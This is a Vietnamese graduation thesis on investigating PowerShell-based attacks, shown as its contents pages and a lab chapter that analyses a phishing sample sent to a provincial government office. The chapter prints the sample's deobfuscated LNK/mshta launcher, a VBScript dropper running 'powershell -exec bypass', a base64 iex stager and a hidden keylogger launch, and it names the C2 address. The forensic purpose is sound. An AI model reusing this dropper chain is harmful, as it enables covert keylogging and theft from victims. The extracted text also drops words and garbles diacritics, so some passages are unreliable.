Đang tải... (xem toàn văn)
Giới thiệu và cách sử dụng công cụ PowerShell, PowerShell ISE và so sánh với Command Prompt đã cũ. Trình bày các tấn công sử dụng PowerShell, đặc biệt là tấn công fileless, cách khai thác PowerShell và quy trình điều tra tấn công có sử dụng PowerShell. Thực nghiệm điều tra tấn công sử dụng PowerShell
BAN CƠ YẾU CHÍNH PHỦ HỌC VIỆN KỸ THUẬT MẬT Mà ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ ĐỒ ÁN TỐT NGHIỆP NGHIÊN CỨU KỸ THUẬT ĐIỀU TRA, TRUY VẾT CÁC CUỘC TẤN CÔNG SỬ DỤNG POWERSHELL Ngành: An tồn thơng tin Mã số: 7.48.02.02 Hà Nội, 2020 BAN CƠ YẾU CHÍNH PHỦ HỌC VIỆN KỸ THUẬT MẬT Mà ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ ĐỒ ÁN TỐT NGHIỆP NGHIÊN CỨU KỸ THUẬT ĐIỀU TRA, TRUY VẾT CÁC CUỘC TẤN CÔNG SỬ DỤNG POWERSHELL Ngành: An tồn thơng tin Mã số: 7.48.02.02 Sinh viên thực hiện: Nguyễn Thanh Trà Lớp: AT12D Người hướng dẫn: ThS Phạm Sỹ Nguyên Đại học Kỹ thuật - Hậu cần CAND Hà Nội, 2020 MỤC LỤC Danh mục kí hiệu viết tắt .iii Danh mục hình vẽ iv Danh mục bảng .vi Lời cảm ơn vii Lời nói đầu viii Chương Tổng quan PowerShell 1.1 Giới thiệu PowerShell 1.2 Cmdlet Command .3 1.3 Sử dụng PowerShell 1.3.1 Tên lệnh PowerShell 1.3.2 Tham số PowerShell 1.3.3 Bí danh thay cho lệnh 1.3.4 Biến PowerShell 1.3.5 Kịch PowerShell 10 1.3.6 Thực thi lệnh từ xa .12 1.4 PowerShell ISE .13 1.4.1 Tổng quan 13 1.4.2 Lợi ích PowerShell ISE .14 1.4.3 PowerShell với PowerShell ISE 15 1.4.4 Sử dụng PowerShell ISE 16 1.5 Kết luận Chương 17 Chương Kỹ thuật điều tra công sử dụng PowerShell 19 2.1 Tấn công sử dụng PowerShell .19 2.1.1 Ransomware 19 2.1.2 W97M.Incompat 20 2.1.3 Keylogger trojan 22 2.1.4 Banking trojan 22 2.1.5 Back door trojan 23 2.2 Tấn công fileless 23 2.2.1 Tổng quan công fileless 23 2.2.2 Các dạng công fileless 24 2.2.3 Bản chất công fileless 25 2.3 Khai thác PowerShell 26 2.3.1 Khai thác 26 2.3.2 Ví dụ khai thác 30 2.4 Quy trình điều tra cơng sử dụng PowerShell 33 2.4.1 Chuẩn bị 33 2.4.2 Ảnh hóa 34 2.4.3 Phân tích 34 2.4.4 Lập báo cáo kết luận .51 2.5 Kết luận Chương 52 Chương Thực nghiệm điều tra công sử dụng PowerShell 53 3.1 Xây dựng hệ thống thực nghiệm 53 3.1.1 Kịch mô 53 3.1.2 Môi trường thực nghiệm 53 3.2 Q trình thực phân tích, điều tra 53 3.2.1 Kiểm tra tập tin đính kèm 54 3.2.2 Kiểm tra Registry .56 3.2.3 Kiểm tra nhật ký kiện 57 3.2.4 Kiểm tra Prefetch .58 3.2.5 Các tiến hành phân tích khác 60 3.3 Đánh giá kết điều tra .61 3.4 Kết luận Chương 64 Kết luận 65 Tài liệu tham khảo .66 DANH MỤC KÍ HIỆU VÀ VIẾT TẮT CAND Công An Nhân Dân CMD Command Prompt Cmdlet Lệnh ghép ngắn GUI Graphical User Interface VBScript Visual Basic Script CTP Community Technology Preview MS-DOS Microsoft Disk Operation System DNS Domain Name System BITS Background Intelligent Transfer Service RDP Remote Desktop Protocol VNC Virtual Network Computing TLS Transport Layer Security EID Event Identification ISE Integrated Scripting Environment RAM Ramdom Access Memory WSMAN Web Services for Management SOAP Simple Object Access Protocol HTA HTML Applications API Application Programming Interface WMI Windows Management Instrumentation WinRM Windows Remote Management UBND Ủy Ban Nhân Dân Danh mục hình v Hình 1.1: PowerShell Hình 1.2: Command Prompt Hình 1.3: Xem tất lệnh sử dụng động từ Get Hình 1.4: Xem tất lệnh sử dụng danh từ Service Hình 1.5: Tạo biến Hình 1.6: Đặt vị trí biến $test Hình 1.7: Hiển thị tất biến Hình 1.8: Sử dụng biến môi trường %SystemRoot% PowerShell 10 Hình 1.9: Tạo tập tin kịch PowerShell 11 Hình 1.10: Chạy thử tập tin kịch .11 Hình 1.11: Kết chạy tập tin kịch 11 Hình 1.12: Windows PowerShell ISE 13 Hình 2.1: Hàm mã hóa PowerShell .20 Hình 2.2: Hàm tải xuống sử dụng PowerShell 21 Hình 2.3 Trojan giám sát tiêu đề có nội dung tài .22 Hình 2.4: Phần danh sách tập tin truy cập PowerShell 37 Hình 2.5: Phần cịn sót lại lệnh "echo" PSSession giữ lại nhớ wsmprovhost.exe 39 Hình 2.6: Phần đầu lại lệnh "dir" nhớ wsmprovhost.exe 39 Hình 2.7: Một phần lệnh từ xa PowerShell nhớ WinRM svchost.exe 40 Hình 2.8: Lệnh PowerShell mã hóa nhật ký phân tích PowerShell 44 Hình 2.9: Nhật ký module lưu kiện nhập lệnh (EID 4103) nhật ký kiện hoạt động PowerShell .46 Hinh 2.10: Nhật ký module ghi lại kiện đầu (EID 4103) .46 Hình 2.11: Mã độc PowerShell thêm vào profile.exe module Persistence PowerSploit .49 Hình 2.12: Liệt kê consumer kiện WMI với PowerShell 51 Hình 3.1: Tập tin đính kèm tập tin sau giải nén 54 Hình 3.2: Tập tin CV_ 242019Qd-UBND.pdf hiển thị sau mở 54 Hình 3.3: Tập tin HTML .55 Hình 3.4: Tập tin VBScript 55 Hình 3.5: Registry khơng có thay đổi sách thực thi 56 Hình 3.6: Các kiện Windows PowerShell 57 Hình 3.7: Chi tiết kiện EID 400, với HostName = ConsoleHost .57 Hình 3.8: Tập tin prefetch cho PowerShell cập nhật 58 Hình 3.9: Một tập tin ps1 thực thi, đường dẫn tập tin .58 Hình 3.10: Các tập tin tìm thấy đường dẫn 58 Hình 3.11: Nội dung tập tin 3.ps1 59 Hình 3.12: Dịch ngược tập tin BTM0h.exe 60 Hình 3.13: Tiến trình svchost.exe độc hại thực thi .60 Hình 3.14: Tiến trình svchost.exe tự động thực thi .60 Hình 3.15: Các thơng tin keylogger mã hóa gửi server 61 Hình 3.16: Sơ đồ công .61 DANH MỤC BẢNG Bảng 1.1: Các kiểu liệu PowerShell Bảng 1.2: So sánh PowerShell Command Prompt .6 Bảng 3.1: Thiết lập mơi trường để phân tích công 53 LỜI CẢM ƠN Để hoàn thành đồ án tốt nghiệp này, lời em xin cảm ơn đến thầy cô Học viện Kỹ thuật Mật mã dạy dỗ trang bị cho em kiến thức bổ ích suốt năm năm qua Qua đây, em xin tỏ lòng biết ơn sâu sắc đến ThS Phạm Sỹ Nguyên – công tác Đại học Kỹ thuật - Hậu cần CAND, người tận tình giúp đỡ, truyền đạt kinh nghiệm hướng để em thực hoàn thành đồ án Em gửi lời cảm ơn đến ThS Nguyễn Thành Chương – phụ trách phòng Ứng cứu cố Trung tâm Ứng cứu khẩn cấp không gian mạng Việt Nam VNCERT/CC, người hướng dẫn chia sẻ hiểu biết để em thực đồ án Sau cùng, em xin gửi lời cảm ơn chân thành tới gia đình, bạn bè động viên, cổ vũ tinh thần có ý kiến đóng góp suốt trình học tập, nghiên cứu trình làm đồ án tốt nghiệp Trong trình thực đồ án, hạn chế kiến thức kinh nghiệm thực tế nên đồ án em chắn tồn thiếu sót, em mong nhận nhận xét, đánh bổ sung quý thầy cô bạn Em xin chân thành cảm ơn! SINH VIÊN THỰC HIỆN ĐỒ ÁN Nguyễn Thanh Trà CHƯƠNG THỰC NGHIỆM ĐIỀU TRA TẤN CÔNG SỬ DỤNG POWERSHELL 3.1 Xây dựng hệ thống thực nghiệm 3.1.1 Kịch mô Một công APT nhằm vào UBND tỉnh Quảng Ngãi vào tháng 12 năm 2019, kẻ công lợi dụng email người dùng gửi hàng loại email giả mạo đính kèm với tập tin “CV_ 242019Qd-UBND.pdf.zip” tới công nhân viên chức tỉnh 3.1.2 Môi trường thực nghiệm Bảng 3.1: Thiết lập mơi trường để phân tích công Tạo máy ảo Phần mềm tạo Vmware Workstation 15 Pro Hệ điều hành Windows Professional 32-bit Kết nối Internet Mạng NAT 192.168.240.0/24 Địa IP 192.168.240.144 Công cụ cài đặt Winrar, WinPrefetchView, Wireshark, HxD, Firefox, DNSpy Thơng tin tập tin đính kèm Tên tập tin: CV_ 242019Qd-UBND.pdf.zip MD5: 047DE62F8F4A5B6C46ED2FFA6108A19E SHA-1: 72C50A9DC0EC30B9630FDC682FA5EBBCC956169A Kích thước: 151 KB Định dạng: WinRAR ZIP (.zip) Sau giải nén ta được: Tên tập tin: CV_ 242019Qd-UBND.pdf.lnk MD5: 3B4095E259903F6063A6B576AA829D00 SHA-1: 1B0F4313E57D631585FE197664380727C626098F Kích thước: 446 KB Định dạng: Shortcut (.lnk) 3.2 Quá trình thực phân tích, điều tra Sau giải nén tập tin đính kèm “CV_ 242019Qd-UBND.pdf.zip” ta tập tin “CV_ 242019Qd-UBND.pdf.lnk” 54 Hình 3.1: Tập tin đính kèm tập tin sau giải nén Quan sát thấy tập tin shortcut làm giống tập tin pdf thông thường Tiến hành mở tập tin CV_ 242019Qd-UBND.pdf.lnk, khoảng thời gian đáng kể xuất CV_ 242019Qd-UBND.pdf Hình 3.2: Tập tin CV_ 242019Qd-UBND.pdf hiển thị sau mở 3.2.1 Kiểm tra tập tin đính kèm Kiểm tra thơng tin tập tin, mục Target có đường dẫn sau: %comspec% /c for %x in (%temp%=%cd%) for /f "delims==" %i in ('dir "%x\CV_ 242019Qd-UBND.pdf.lnk" /s /b') start m %windir:~-1,1%hta.exe "%i" Đoạn lệnh làm rối cách sử dụng biến %comspec% để thay cho việc gọi trực tiếp chuỗi “cmd.exe” chữ “s” tên tập tin mshta.exe 55 lấy cách cắt ký tự cuối giá trị chứa biến “%windir%” (thường C:\Windows) Khi tập tin shortcut mở đoạn lệnh chạy lệnh trường Target thực thi tập tin mshta.exe để mở tập tin Khi kiểm tra tập tin đính kèm thấy tập tin HTML tập tin VBScript làm rối Hình 3.3: Tập tin HTML Hình 3.4: Tập tin VBScript Đoạn Vbscirpt làm rối cách sử dụng tên hàm, biến chuỗi ký tự vô nghĩa sử dụng hàm chr() để thay cho ký tự, chữ hàm Sau gỡ rối ta tập tin sau: function DownloadFunction(data,SavedFile) dim dom,elm,stm set dom=createobject(microsoft.xmldom) set elm=dom.createelement("z") elm.datatype=bin.hex elm.text=data Set objectStream = CreateObject(ADODB.Stream) objectStream.Type = 56 objectStream.Open objectStream.write elm.NodeTypedValue objectStream.saveToFile SavedFile, objectStream.Close set stm=nothing set elm=nothing set dom=nothing end function Set wsshell=CreateObject(“Wscript.Shell”) Set tmp_path=wsshell.Environment(“Process”) SavedFile=tmp_path.Item(TEMP) & "\3.ps1" DownloadFunction data_var, SavedFile Const nShow = strDot = "." Set zdQWRPNSi = GetObject("winmgmts:\\.\root\cimv2") Set KkJiYOdbLrGSRxEvFWt = zdQWRPNSi.Get("Win32_Process Startup") Set startup_process = KkJiYOdbLrGSRxEvFWt.SpawnInstance_ startup_process.ShowWindow = nShow Set process = GetObject(“winmgmts:\\.\root\cimv2:Win32_Process”) process.Create “cmd.exe /c powershell.exe -exec bypass -file” & SavedFile, Null, startup_process, leIsifstlPaerpwiSU self.close Kịch có nhiệm vụ lưu đoạn mã hex khai báo đầu tập tin thành tập tin 3.ps1 tư mục %TEMP% sau thực thi câu lệnh: Cmd.exe /c powershell.exe -exec bypass -file 3.2.2 Kiểm tra Registry Sử dụng cửa sổ regedit để mở cấu hình registry, truy cập khóa theo đường dẫn HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Micr osoft.PowerShell\ Không phát chứng việc thay đổi sách thực thi PowerShell 57 Hình 3.5: Registry khơng có thay đổi sách thực thi 3.2.3 Kiểm tra nhật ký kiện Kiểm tra tập tin nhật ký Windows PowerShell.evtx công cụ Event Viewer Hình 3.6: Các kiện Windows PowerShell Có thể thấy phiên làm việc cục diễn xuất hai kiện EID 400 EID 403 có trường HostName = ConsoleHost Đây hai kiện với dấu thời gian xác định thời điểm thực thi tập tin 3.ps1 58 Hình 3.7: Chi tiết kiện EID 400, với HostName = ConsoleHost 3.2.4 Kiểm tra Prefetch Truy cập vào đường dẫn %systemroot%\prefetch, tập tin POWERSHELL.EXE-59FC8F3D.pf có cập nhật thời gian vào thời điểm mở tập tin CV_ 242019Qd-UBND.pdf.lnk Hình 3.8: Tập tin prefetch cho PowerShell cập nhật Sử dụng công cụ WinPrefetchView để xem tập tin POWERSHELL.EXE59FC8F3D.pf Phát tập tin 3.ps1 thực thi, lưu đường dẫn C:\Users\ADMINISTRATOR\AppData\Local\Temp Hình 3.9: Một tập tin ps1 thực thi, đường dẫn tập tin 59 Truy cập đường dẫn cịn phát có tập tin svchost.exe, BTM0h.exe CV_ 242019Qd-UBND.pdf lưu đường dẫn thời điểm với việc mở tập tin CV_ 242019Qd-UBND.pdf.lnk Hình 3.10: Các tập tin tìm thấy đường dẫn 60 Tiến hành mở tập tin 3.ps1 Notepad, quan sát tập tin có dạng: $NCltCe="[Đoạn mã hóa]” $QmFzZT=([Text.Encoding]::ASCII.GetString([Convert]::FromBase64 String("$NCltCe"))) iex $QmFzZT Hình 3.11: Nội dung tập tin 3.ps1 Các đoạn kịch PowerShell có chức giải mã chạy đoạn kịch khác mã hóa base64 Tiếp tục giải mã đoạn mã ta đoạn kịch PowerShell có dạng: $CV = $env:TEMP+"\CV_ 242019Qd-UBND.pdf"; [Byte[]]$cv_byte = [System.Convert]::FromBase64String("[Đoạn mã hóa]”); [System.IO.File]::WriteAllBytes($CV,$cv_byte); Start-Process -FilePath $CV $CodeFile = $env:TEMP+"\BTM0h.exe"; [Byte[]]$var_code = [System.Convert]::FromBase64String("[Đoạn mã hóa]”); [System.IO.File]::WriteAllBytes($CodeFile,$var_code); $DKjGi = @" /c """"$CodeFile"""" "@ Start-Process -windowstyle Hidden -FilePath "cmd.exe" -ArgumentList "$DKjGi" Đoạn kịch thực nhiệm vụ tạo hai tập tin CV_ 242019QdUBND.pdf BTM0h.exe việc giải mã base64 kịch 61 3.2.5 Các tiến hành phân tích khác Tiến hành dịch ngược tập tin BTM0h.exe phát tập tin thực thi ghi nhật ký keylogger đồng thời tải tập tin svchost.exe Hình 3.12: Dịch ngược tập tin BTM0h.exe Sử dụng công cụ Autorun Process Explorer, thấy tập tin svchost.exe thực thi tự động Hình 3.13: Tiến trình svchost.exe độc hại thực thi Hình 3.14: Tiến trình svchost.exe tự động thực thi Sử dụng cơng cụ Wireshark dễ dàng phát nhiều phiên trao đổi với địa 103.68.251.31:5552 Xem hội thoại phát thông tin keylogger mã hóa base64 gửi tới 103.68.351.31:5552 62 Hình 3.15: Các thơng tin keylogger mã hóa gửi server 3.3 Đánh giá kết điều tra Hình 3.16: Sơ đồ cơng 63 Bước 1: Kẻ cơng gửi email lừa đảo Qua phân tích dễ dàng thấy kẻ cơng muốn nhằm vào thông tin hoạt động công nhân viên UBND tỉnh Quảng Ngãi Sử dụng email giả dạng nhân viên UBND tỉnh Quảng Ngãi, kẻ công phát tán hàng loạt mã độc dạng tập tin tài liệu CV_ 242019QdUBND.pdf.zip đính kèm email Bước 2: Nạn nhân thực thi mã độc Kẻ công sử dụng công văn UBND tỉnh Quảng Ngãi ban hành gần thời gian công để làm tài liệu lừa đảo Email giả mạo kèm theo tập tin đính kèm tạo để nhìn giống thơng báo bình thường UBND Tập tin tài liệu tập tin zip, nén bên tập tin CV_ 242019Qd-UBND.pdf.lnk Đây tập tin shortcut cmd.exe làm giống tập tin tài liệu pdf thông thường Đây kĩ thuật social-engineering thông thường để lừa người dùng tải thực thi mã độc Bước 3: Mã độc hoạt động Lợi dụng điểm yếu bảo mật Windows 7, mã độc cấu tạo để chạy lệnh cmd.exe cách để câu lệnh làm rối trường Target tập tin shortcut Sẽ không thấy khác biệt khơng kiểm tra quan sát kỹ Câu lệnh gọi đến công cụ mshta.exe để mở tập tin shortcut Trong tập tin shortcut có chứa tập tin HTML Application (HTA) đoạn Visual Basic Script (VBScript) File HTA chứa đoạn mã hex đoạn VBScript làm rối Sau gỡ rối đoạn VBScript thấy chức đoạn kịch chuyển đoạn hex tập tin HTA thành tập tin 3.ps1 thư mục %TEMP% dùng powershell.exe chạy tập tin 3.ps1 Chính sách thực thi PowerShell loại bỏ tham số đơn giản (-exec bypass) nên tập tin kịch PowerShell 3.ps1 thực thi dễ dàng PowerShell tin tưởng hệ thống nên tập tin kịch chạy mà không bị ngăn cản hệ thống bảo mật Đây điều kẻ công nhắm tới, mã độc hoạt động trót lọt mở PowerShell Có thể tìm thấy tập tin 3.ps1 số tập tin có thời gian tạo đồng thời thư mục %TEMP% Kiểm tra tập tin 3.ps1, dễ dàng thấy đoạn scipt sử dụng để giải mã chạy đoạn kịch khác mã hóa base64 Sau giải mã đoạn mã base64 tập tin 3.ps1 đoạn kịch PowerShell khác có chức tạo hai tập tin từ hai đoạn mã base64 kịch 64 Một tập tin tài liệu pdf dùng để lừa đảo, tập tin cịn lại phần mềm chạy để tạo keylogger tải tập tin svchost.exe Bước 4: Gửi thông tin thu thập cho kẻ công Svchost.exe tạo giống tập tin dịch vụ hệ thống thông thường chạy tự động hệ thống nạn nhân với chức gửi thông tin keylogger ghi địa 103.68.251.31:5552 Cách tạo tập tin chạy ngầm svchost.exe làm nhầm lẫn với tập tin dịch vụ hệ thống không bị phát người dùng thông thường Với người chun mơn cơng nghệ thơng tin hay an tồn thơng tin, mã độc khơng bị phát hành động mã độc khơng gây tốn nhiều tài ngun máy khơng biểu ngồi Thơng tin nạn nhân bị gửi âm thầm, mục đích kẻ cơng Biện pháp phịng chống Do mục tiêu nhắm đến thường người có kiến thức an tồn thơng tin cơng nghệ thơng tin nên điều cần ý phải kiểm tra rõ tính xác email tập tin nhận Cần phải xác thực tất tập tin đính kèm, kiểm tra xem kích thước tập tin hay mở rộng tập tin có điều khác lạ hay không Nếu phát điều đặc biệt khơng mở tập tin trực tiếp mà phải gửi cảnh báo lên quan chuyên trách an tồn thơng tin, đồng thời cảnh báo tới đồng nghiệp, cán quan nhận Hầu hết Windows nhiều lỗ hổng bị khai thác, nên cần phải nâng cấp lên Windows 10 cập nhật Cần theo dõi kiểm tra hoạt động PowerShell nhật ký kiện hay tập tin prefetch cho PowerShell Các hoạt động thông thường không ảnh hưởng đến kiện này, việc sử dụng PowerShell người dùng hạn chế (có thể không) nên việc thay đổi dấu thời gian cho việc sử dụng PowerShell chứng cho việc PowerShell bị khai thác máy Sử dụng công cụ Process Explorer Autorun để kiểm tra tiến trình hoạt động tự khởi động máy Cần để ý kỹ tiến trình đặc biệt svchost.exe, xem phần Company Name để xem có tiến trình hệ thống khơng Ngồi sử dụng cơng cụ Wireshark để kiểm tra kết nối tới địa bên Điều cần kiến thức định mơ hình mạng Bằng 65 cách biết kết nối đáng ngờ tới địa không xác định 3.4 Kết luận Chương Kịch đặt công APT nhằm vào thông tin hoạt động công nhân viên chức UBND tỉnh Quảng Ngãi Kẻ công sử dụng email lừa đảo để phát tán mã độc Qua trình phân tích thấy mã độc mà kẻ công sử dụng lợi dụng VBScript để chạy tập tin kịch PowerShell máy nạn nhân Bằng cách đó, kẻ cơng tạo keylogger để thu thập thông tin người dùng gửi server có địa định sẵn Với cách lợi dụng PowerShell để thực thi kịch độc hại, kẻ công vượt qua công cụ bảo mật máy tính nạn nhân để tải thực thi tiến trình độc hại Từ thấy PowerShell kẻ công nhắm đến sử dụng công cụ giúp vượt qua bảo mật vốn lỏng lẻo máy tính nạn nhân 66 KẾT LUẬN Microsoft PowerShell tiện ích dịng lệnh ngôn ngữ kịch bản, công cụ mã nguồn mở mạnh mẽ dành cho quản trị viên, tự động hóa hàng loạt nhiệm vụ cho máy tính mạng PowerShell chứa thành phần Command Prompt xây dựng framework NET PowerShell thực khác so với Command Prompt Công cụ sử dụng lệnh khác gọi cmdlet Nhiều nhiệm vụ quản trị hệ thống từ quản lý registry đến WMI (Windows Management Instrumentation) hiển thị qua lệnh cmdlet PowerShell, Command Prompt thực Song song với PowerShell, Windows cịn phát triển thêm Windows PowerShell ISE, mơi trường mã hóa tích hợp bao gồm giao diện đồ họa cho người dùng lập trình nâng cao tích hợp công cụ khác hỗ trợ việc không cần nhập tất lệnh dòng lệnh PowerShell có tương tác sâu với hệ thống, có quyền truy cập sử dụng kẻ cơng dễ dàng thực hành vi độc hại Kẻ cơng dùng mã độc lừa người dùng kích hoạt chúng, sau chạy tập tin kịch PowerShell thực hành vi độc hại Các công sử dụng PowerShell thường không để lại tập tin hay ghi nào, khó phát công Điều tra công sử dụng PowerShell thực với quy trình giống điều tra số khác Khi PowerShell bị lợi dụng thông tin thời gian chạy hoạt động PowerShell chứng công Các chứng tìm thấy nguồn registry, tập tin prefetch, lưu lượng truy cập mạng, nhớ, nhật ký kiện, Các hoạt động PowerShell ghi lại dù vơ tình hay cố ý, qua tái lại công xảy Bằng công cụ cần thiết, việc truy vết công sử dụng PowerShell hồn tồn Qua việc điều tra thực nghiệm cho thấy việc sử dụng PowerShell công mấu chốt để thực hành vi độc hại Một kịch PowerShell thực thi để tạo tải mã độc cách dễ dàng công cụ tin tưởng hồn tồn hệ thống Từ đặt vấn đề quan sát kiểm soát hoạt động PowerShell để phịng tránh cơng lợi dụng công cụ 67 TÀI LIỆU THAM KHẢO [1] Daniel Parchisanu, Simple questions: What is PowerShell in Windows, and what you can with it?, 2018 [2] Margaret Rouse, Microsoft Windows PowerShell Integrated Scripting Environment (ISE), 2020 [3] Trend Micro, ‘Purple Fox’ Fileless Malware with Rookit Component Delivered by Rig Exploit Kit Now Abuses PowerShell, 2019 [4] Alison Grace Johansen, What is fileless malware and how does it work?, 2019 [5] Ryan Kazanciyan, Matt Hastings, Investigating PowerShell attacks, 2014 [6] Symantec, The increased use of PowerShell in attacks, 2016 [7] Michael Sikorski Andrew Honig, Practical Malware Analysis, 2012 [8] Monnappa K A, Learning Malware Analysis, 2018 68 ... kịch công Mục tiêu việc nghiên cứu đồ án tốt nghiệp với đề tài "Nghiên cứu kỹ thuật điều tra, truy vết cơng sử dụng PowerShell" tìm hiểu tổng quan PowerShell, sau nghiên cứu kỹ thuật điều tra, ... PowerShell với PowerShell ISE 15 1.4.4 Sử dụng PowerShell ISE 16 1.5 Kết luận Chương 17 Chương Kỹ thuật điều tra công sử dụng PowerShell 19 2.1 Tấn công sử dụng PowerShell. .. Prompt cũ Chương 2: Kỹ thuật điều tra cơng sử dụng PowerShell: Trình bày công sử dụng PowerShell, đặc biệt công fileless, cách khai thác PowerShell quy trình điều tra cơng có sử dụng PowerShell Chương